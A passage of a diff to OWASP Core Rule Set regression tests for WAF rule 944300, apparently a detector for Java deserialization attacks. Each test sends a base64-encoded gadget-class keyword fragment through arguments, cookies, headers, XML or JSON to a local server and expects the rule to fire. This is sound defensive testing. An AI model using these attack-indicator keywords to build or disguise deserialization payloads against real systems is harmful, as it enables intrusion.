User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 282 desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 